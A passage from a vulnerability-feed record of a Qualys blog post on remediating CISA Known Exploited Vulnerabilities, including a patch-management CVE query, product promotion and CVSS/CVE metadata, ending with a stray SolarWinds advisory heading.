remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

SolarWinds Releases Advisory for Serv-U Vulnerability

Description

Related